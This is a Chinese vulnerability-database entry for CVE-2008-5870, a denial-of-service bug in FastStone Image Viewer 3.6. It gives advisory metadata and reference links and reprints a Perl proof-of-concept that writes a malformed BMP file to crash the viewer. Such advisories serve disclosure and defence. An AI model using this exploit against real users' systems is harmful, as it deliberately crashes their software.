FastStone Image Viewer 多个BMP拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116347 漏洞类型 输入验证
发布时间 2008-10-05 更新时间 2009-01-29
CVE编号 CVE-2008-5870 CNNVD-ID CNNVD-200901-075
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/6673
https://cxsecurity.com/issue/WLB-2009010134
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-075
|漏洞详情
FastStoneImageViewer、ACDSeePhotoManager都是非常流行的图片浏览器。FastStoneImageViewer3.6版本允许用户协助式攻击者借助一个畸形的BMO图像,引起拒绝服务攻击(应用程序崩溃)。该畸形的BMO图像有过大的宽度值和高度值。
|漏洞EXP
Name      : FastStone Image Viewer v3.6 (malformed bmp image) DoS Exploit
Credit    : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com
Download: : http://www.FastStone.org
Greetz    : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, 
            Katharsis, all from #dark-coders and others;]

PoC:

#!/usr/local/bin/perl   
# Open file (File->Open) or simply click on the image miniature
# FastStone Image Viewer v3.6 simply crashes
# Tested on Windows 2000 SP4
#-----INFO----------------------
#EAX 00002847
#ECX 00000000
#EDX 00402818 dumped_F.00402818
#EBX 00402818 dumped_F.00402818
#ESP 00402818 dumped_F.00402818
#EBP 0012DF08
#ESI 00402818 dumped_F.00402818
#EDI 000161E8
#EIP 012F0447
#
#Reason: "Access violation when writing to [00002847]
#-----INFO----------------------

my $code="\x42\x4d\x3c\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00".
         "\x00\x00\xcc\x5f\x01\x00\xe8\x61\x01\x00\x01\x00\x18\x00\x00\x00".
         "\x00\x00\x06\x00\x00\x00\x98\x9e\x00\x00\x88\x77\x00\x00\xff\x02".
         "\xfd\x00\x00\x00\x00\x00\x41";
my $file="open_me.bmp";

open(my $FILE, ">>$file") or die "[!]Cannot open file";
print $FILE $code;
close($FILE);
print "$file has been generated\n"
print "Credit: suN8Hclf, www.dark-coders.pl"

# milw0rm.com [2008-10-05]
|参考资料

来源:BUGTRAQ
名称:20081005FastStoneImageViewerv3.6(malformedbmpimage)DoSExploit
链接:http://www.securityfocus.com/archive/1/archive/1/497061/100/0/threaded
来源:MILW0RM
名称:6673
链接:http://www.milw0rm.com/exploits/6673
来源:SREASON
名称:4878
链接:http://securityreason.com/securityalert/4878